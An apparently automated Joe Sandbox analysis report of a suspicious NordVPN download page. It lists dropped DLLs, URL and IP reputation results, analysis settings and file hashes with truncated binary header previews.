C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageMetaData.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageStitcher.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCommand.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCreation.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceUnique.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\CGRCommand.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_Camera.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_MotionSet.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_SysInfo.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_TextOut.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\ESM_SaveTextFile.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FileDialog.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FloatTexture.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GFSDK_ShadowLib.win64.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GPUPerfAPIDX11-x64.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GUISkin.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GroupBuffer.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceContainer.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefHash.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefSphereTree.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefTree.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceChannel.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceFunction.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Object.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Surface.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\TextFilter.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Win32_Font.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\XMLDOMCommand.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\CopyImage.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100AGM.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100PDFL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_DirectInput.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_ImportObject.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_MatrixInterpolateSet.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_SoundFile2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_UserInput.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FModSound.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FileLoader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Image.Services.Core.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Internet.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\ObjectDataCommand.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SAXParser.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SceneContainerCommand.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\StyleTransfer.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Tesselator.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://anglebug.com/29700%URL Reputationsafe
http://anglebug.com/34520%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://anglebug.com/31530%URL Reputationsafe
http://anglebug.com/10850%VirustotalBrowse
https://crbug.com/650547call_clear_twiceUsing0%VirustotalBrowse
http://anglebug.com/36250%VirustotalBrowse
http://anglebug.com/36230%VirustotalBrowse
http://anglebug.com/36230%Avira URL Cloudsafe
http://anglebug.com/36240%Avira URL Cloudsafe
https://crbug.com/650547call_clear_twiceUsing0%Avira URL Cloudsafe
http://anglebug.com/36250%Avira URL Cloudsafe
http://anglebug.com/35020%Avira URL Cloudsafe
http://anglebug.com/10850%Avira URL Cloudsafe
http://anglebug.com/30270%Avira URL Cloudsafe
http://anglebug.com/3246allow_clear_for_robust_resource_initSome0%Avira URL Cloudsafe
http://crbug.com/7726510%Avira URL Cloudsafe
http://crbug.com/8832760%Avira URL Cloudsafe
http://crbug.com/6505470%Avira URL Cloudsafe
http://anglebug.com/29780%Avira URL Cloudsafe
http://crbug.com/941620dont_translate_uniform_block_to_structured_bufferFails0%Avira URL Cloudsafe
http://anglebug.com/43840%Avira URL Cloudsafe
http://anglebug.com/44280%Avira URL Cloudsafe
http://anglebug.com/15120%Avira URL Cloudsafe
http://crbug.com/3986940%Avira URL Cloudsafe
https://crbug.com/7058650%Avira URL Cloudsafe
http://anglebug.com/20460%Avira URL Cloudsafe
http://anglebug.com/34980%Avira URL Cloudsafe
http://anglebug.com/42670%Avira URL Cloudsafe
http://crbug.com/1102630%Avira URL Cloudsafe
http://anglebug.com/30160%Avira URL Cloudsafe
http://crbug.com/8094220%Avira URL Cloudsafe
https://crbug.com/6505470%Avira URL Cloudsafe
https://crbug.com/10464620%Avira URL Cloudsafe
http://www.datalogics.com0%Avira URL Cloudsafe
http://crbug.com/6422270%Avira URL Cloudsafe
http://anglebug.com/16370%Avira URL Cloudsafe
http://anglebug.com/27270%Avira URL Cloudsafe
http://anglebug.com/38590%Avira URL Cloudsafe
http://crbug.com/398694ANGLE_DEFAULT_PLATFORMvulkanvulkan-nullswiftshadergld3d11nullGPU.ANGLE.Displa0%Avira URL Cloudsafe
http://anglebug.com/4820%Avira URL Cloudsafe
https://crbug.com/593024select_view_in_geometry_shaderThe0%Avira URL Cloudsafe
http://anglebug.com/21520%Avira URL Cloudsafe
http://anglebug.com/22730%Avira URL Cloudsafe
http://anglebug.com/32430%Avira URL Cloudsafe
http://anglebug.com/30450%Avira URL Cloudsafe
http://anglebug.com/44900%Avira URL Cloudsafe
http://crbug.com/3083660%Avira URL Cloudsafe
http://anglebug.com/32050%Avira URL Cloudsafe
https://crbug.com/5930240%Avira URL Cloudsafe
https://crbug.com/655534use_system_memory_for_constant_buffersCopying0%Avira URL Cloudsafe
http://crbug.com/5651790%Avira URL Cloudsafe
http://anglebug.com/25140%Avira URL Cloudsafe
http://anglebug.com/32060%Avira URL Cloudsafe
http://crbug.com/9416200%Avira URL Cloudsafe
http://anglebug.com/42140%Avira URL Cloudsafe
http://anglebug.com/32460%Avira URL Cloudsafe
http://anglebug.com/37290%Avira URL Cloudsafe
http://crbug.com/8300460%Avira URL Cloudsafe
http://crbug.com/4039570%Avira URL Cloudsafe
https://crbug.com/7104430%Avira URL Cloudsafe
http://crbug.com/6723800%Avira URL Cloudsafe
http://crbug.com/7093510%Avira URL Cloudsafe
http://anglebug.com/30780%Avira URL Cloudsafe
http://anglebug.com/44420%Avira URL Cloudsafe
http://crbug.com/8495760%Avira URL Cloudsafe
http://crbug.com/9274700%Avira URL Cloudsafe
http://anglebug.com/2152skip_vs_constant_register_zeroIn0%Avira URL Cloudsafe
http://anglebug.com/39970%Avira URL Cloudsafe
http://anglebug.com/44050%Avira URL Cloudsafe
http://anglebug.com/14520%Avira URL Cloudsafe
http://crbug.com/6426050%Avira URL Cloudsafe
http://anglebug.com/19360%Avira URL Cloudsafe
http://crbug.com/7972430%Avira URL Cloudsafe
http://javafx.com/vp6decoderflvdemux0%Avira URL Cloudsafe
http://javafx.com/0%Avira URL Cloudsafe
http://anglebug.com/27030%Avira URL Cloudsafe
http://crbug.com/6446690%Avira URL Cloudsafe
https://crbug.com/6555340%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
https://vpn-get.com/false
    unknown
    https://vpn-get.com/nordvpnfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://anglebug.com/1085libGLESv2.dll.6.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://crbug.com/650547call_clear_twiceUsinglibGLESv2.dll.6.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://anglebug.com/3502libGLESv2.dll.6.drfalse
      • Avira URL Cloud: safe
      unknown
      http://anglebug.com/3623libGLESv2.dll.6.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://anglebug.com/3625libGLESv2.dll.6.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://anglebug.com/3624libGLESv2.dll.6.drfalse
      • Avira URL Cloud: safe
      unknown
      http://anglebug.com/2970libGLESv2.dll.6.drfalse
      • URL Reputation: safe
      unknown
      http://anglebug.com/3027libGLESv2.dll.6.drfalse
      • Avira URL Cloud: safe
      unknown
      http://anglebug.com/3246allow_clear_for_robust_resource_initSomelibGLESv2.dll.6.drfalse
      • Avira URL Cloud: safe
      unknown
      http://crbug.com/772651libGLESv2.dll.6.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.rarlab.com/themes.htmWinRAR.exe.6.drfalse
        high
        http://anglebug.com/2978libGLESv2.dll.6.drfalse
        • Avira URL Cloud: safe
        unknown
        http://crbug.com/650547libGLESv2.dll.6.drfalse
        • Avira URL Cloud: safe
        unknown
        http://crbug.com/883276libGLESv2.dll.6.drfalse
        • Avira URL Cloud: safe
        unknown
        http://crbug.com/941620dont_translate_uniform_block_to_structured_bufferFailslibGLESv2.dll.6.drfalse
        • Avira URL Cloud: safe
        unknown
        http://anglebug.com/4384libGLESv2.dll.6.drfalse
        • Avira URL Cloud: safe
        unknown
        http://anglebug.com/3452libGLESv2.dll.6.drfalse
        • URL Reputation: safe
        unknown
        http://www.rarlab.comWinRAR.exe.6.drfalse
          high
          http://crl.thawte.com/ThawteTimestampingCA.crl07za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drfalse
            high
            http://anglebug.com/1512libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/4428libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/398694libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3498libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            https://crbug.com/705865libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/2046libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/4267libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/110263libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3016libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            https://crbug.com/650547libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/809422libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            https://crbug.com/1046462libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.datalogics.com7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, DL100AGM.dll0.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/642227libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/1637libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/2727libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3859libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/398694ANGLE_DEFAULT_PLATFORMvulkanvulkan-nullswiftshadergld3d11nullGPU.ANGLE.DisplalibGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/482libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            https://crbug.com/593024select_view_in_geometry_shaderThelibGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/2152libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/2273libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3045libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3243libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/4490libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/308366libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3205libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            https://crbug.com/593024libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/565179libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            https://crbug.com/655534use_system_memory_for_constant_buffersCopyinglibGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/2514libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3206libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.thawte.com07za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drfalse
            • URL Reputation: safe
            unknown
            http://anglebug.com/3246libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/4214libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/941620libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://anglebug.com/3729libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crbug.com/830046libGLESv2.dll.6.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.symauth.com/cps0(lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drfalse
              high
              http://crbug.com/403957libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              https://crbug.com/710443libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://anglebug.com/3153libGLESv2.dll.6.drfalse
              • URL Reputation: safe
              unknown
              http://crbug.com/672380libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crbug.com/709351libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://anglebug.com/3078libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://anglebug.com/4442libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crbug.com/849576libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crbug.com/927470libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://anglebug.com/2152skip_vs_constant_register_zeroInlibGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://anglebug.com/3997libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crbug.com/642605libGLESv2.dll.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.symauth.com/rpa00lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drfalse
                high
                http://anglebug.com/4405libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://anglebug.com/1452libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://javafx.com/fxplugins.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://javafx.com/vp6decoderflvdemuxfxplugins.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://anglebug.com/1936libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://crbug.com/797243libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://anglebug.com/2703libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                http://crbug.com/644669libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                https://crbug.com/655534libGLESv2.dll.6.drfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                142.250.203.106
                unknownUnited States
                15169GOOGLEUSfalse
                34.104.35.123
                unknownUnited States
                15169GOOGLEUSfalse
                162.55.188.142
                unknownUnited States
                35893ACPCAfalse
                142.250.203.110
                unknownUnited States
                15169GOOGLEUSfalse
                5.45.85.133
                unknownRussian Federation
                58061SCALAXY-ASNLfalse
                193.3.17.197
                unknownDenmark
                2107ARNES-NETAcademicandResearchNetworkofSloveniaSIfalse
                8.8.8.8
                unknownUnited States
                15169GOOGLEUSfalse
                172.217.168.68
                unknownUnited States
                15169GOOGLEUSfalse
                172.217.168.45
                unknownUnited States
                15169GOOGLEUSfalse
                172.217.168.67
                unknownUnited States
                15169GOOGLEUSfalse
                185.215.4.79
                unknownDenmark
                50129TVHORADADAESfalse
                104.192.141.1
                unknownUnited States
                16509AMAZON-02USfalse
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                52.216.240.12
                unknownUnited States
                16509AMAZON-02USfalse
                92.223.124.62
                unknownAustria
                199524GCOREATfalse
                IP
                192.168.2.1
                127.0.0.1
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:756292
                Start date and time:2022-11-30 00:06:30 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 18s
                Hypervisor based Inspection enabled:false
                Report type:light
                Cookbook file name:browseurl.jbs
                Sample URL:https://vpn-get.com/nordvpn
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:SUS
                Classification:sus25.evad.win@43/220@0/17
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Browse: https://vpn-get.com/
                • Browse: https://soft-got.host/vgc/NordVPN-10_11.zip
                • Browse: https://soft-got.host/vgc/NordVPN-7_8.zip
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                • Created / dropped Files have been reduced to 100
                • Execution Graph export aborted for target unarchiver.exe, PID 1032 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                No simulations
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5714248
                Entropy (8bit):6.788288927588834
                Encrypted:false
                SSDEEP:98304:XETWMdQ1hV9M5wnx+49cRtvw7gVSOFld6QHJXJTHSewUgvhiWaOuBu3Cb+tbMTy2:XVVK58x+NRtomSuldtHJhyyb+tbM1
                MD5:21CB25B78EE9D4E2D651C600BA2BE2A3
                SHA1:E3BC20EE47633D06427015C07906DE925DB0B5DD
                SHA-256:75330E04960E72EEE106671CEEC9BD768E91DE1944CAFD402AAF7422C4BD7B39
                SHA-512:8CAB7A1FBA7FE8E6FF286B763504E18A9B465FACFE4D0F3A1FDFC06129885BE1535225FF99FEBFCD37C638291662D7BEB1E40F5C27391CE8ECE5317131AEBCCF
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.A2../a../a../a..a../a..a6./a)zTa../a...a../a..a../a..a&./a..a../a..a../a..a../aRich../a................PE..L...9..R.........."!......:..T......(.4.......:....(..........................Z.....L.W...@.........................p.O.|.....O.x.... U...............W.H....0U..,..@.:.......................G.......G.@.............:.......O......................text....:.......:................. ..`.rdata........:.......:.............@..@.data....k....O.......O.............@....tls..........U......DR.............@....rsrc........ U......FR.............@..@.reloc..l....0U......NR.............@..B................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):6732104
                Entropy (8bit):6.774431303294623
                Encrypted:false
                SSDEEP:196608:8xD1n+MwOPY6cikEpFjAOlYFOaEsZNros0aUh:8LgOPY6cikEz7TINr1G
                MD5:714CDAC1D60200AF009AB20403A18D34
                SHA1:BEF10479C60E9244C0205F31806F0E622532569C
                SHA-256:C9C4BA9D27734D3FF60D18ECCF883EE54AE3CD2ECE4F7048C56C9C1FF707B931
                SHA-512:CF503253E0A0A6DB7D9F73A2B2309D3A274154F5B665EE5642E350BFEDCD6193E2875D23CEEA621DC8918DB9494FDD20E94ABF160E6EDBE12444673C0F54B72C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.#.U.p.U.p.U.p<.tp.U.p..wp.U.p...p.U.p...p.U.p...p.U.p..qp.U.p.U.pIT.p..fp.W.p..apdU.p..pp.U.p..vp.U.p..sp.U.pRich.U.p................PE..L......R.........."!......A...$.....:.........A....!.........................@g.....Q.g...@...........................U.......U.T.... ^...............f.H.....a.0Q....A.............................X.J.@.............A.......U.@....................text.....A.......A................. ..`.rdata..r.....A.......A.............@..@.data...8w....V.......V.............@....rsrc........ ^.......].............@..@.reloc..\P....a..R...Na.............@..B................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):1689600
                Entropy (8bit):6.281216665679078
                Encrypted:false
                SSDEEP:24576:ycLgCOTC8FxtcVdwk8RbhIr0FQpB2yyS+QGFIz6Mu4wEbPuiC:tgK8F4VahQmClkW6JEbPub
                MD5:19FD647448B26325E0C1F68A9A3FA03C
                SHA1:58F7092EC4CD64E82B20819C442EF1936F3F09D3
                SHA-256:8BDDCDF33588DF8C54AD3A2823D60CEFF5F08E73A055B1B1A4F8878B713636E5
                SHA-512:E18DDFA05D36EB8020EF5C38A598EE40FA3F342345F33A6AB1D8724465437AE9DAD31AFDA6006359D0443E17CBBEFF13846BA5CC26311997C7F0335087254F64
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,.IHM..HM..HM..>..IM..>..CM..HM..+M..>...M...$..IM..>..dM...$..IM..S.x.MM..>..IM..>..IM..>..IM..RichHM..........................PE..d...0.._.........." .........J............................................................`.............................................y.......x........{...................@..@.......................................................h............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata........... ..................@..@.rsrc....{.......|..................@..@.reloc...1...@...2..................@..B........................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):475648
                Entropy (8bit):6.171106194022655
                Encrypted:false
                SSDEEP:6144:5sxgh2tusg0dS/ds1PkaMzfVNi3N3Dhak3qQw6/noQop71X9DwEdHtVzWh70+z82:SghWusg9/EPEz3cbC759VHtV3qqVQl
                MD5:EBC2E82461723839526B38B2CDE0EDD1
                SHA1:747722C4D3317CD2F4A963A37627C1D41DE51A6C
                SHA-256:A969163E3E72BB6B0CF77E2FD7D7EAD29FCFBC9D0D5C85FC5873DE937A3C9B6D
                SHA-512:642992F0287E6ACACD37484203D1202CF343840774965BC4E5640FB9B36AE2563E7CA426C931A51CF9D24C8417CFE81F79E420E0809256EE4D5D2EC446F810CB
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2c..S...S...S....p..S....v..S...S...S....c..S...:...S....`..S......S....q..S....u..S..Rich.S..........PE..d...0.._.........."..........p................@...........................................`.....................................................x...............Xb......................................................................@............................text............................... ..`.rdata..d...........................@..@.data....,..........................@....pdata..Xb.......d..................@..@.rsrc................,..............@..@.reloc...............4..............@..B........................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:DOS batch file, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1166
                Entropy (8bit):4.896041631619531
                Encrypted:false
                SSDEEP:24:Y5lX3ZmS5Vmho5VmQ83BVmM83TwVmPDW28QRn:YXX3B5yey3B63MRTgn
                MD5:CEEC1F5AC090FB6AC6CE4B6F6651A4E5
                SHA1:C3D381509821680EDCC77AA463C60BF96D1F2153
                SHA-256:53ED0E06691353BBE468BFAA839F73C53A75D891EB2AA6884C63403E13BBCD3F
                SHA-512:66A744957E2AC9966170206E211F92B2503232F9BCDF9E4052D5B4C370ADD94C348EA401823B2050C802B50D128CB8DCBECBA46F6C75F2257D9C36FE67BB1123
                Malicious:false
                Reputation:low
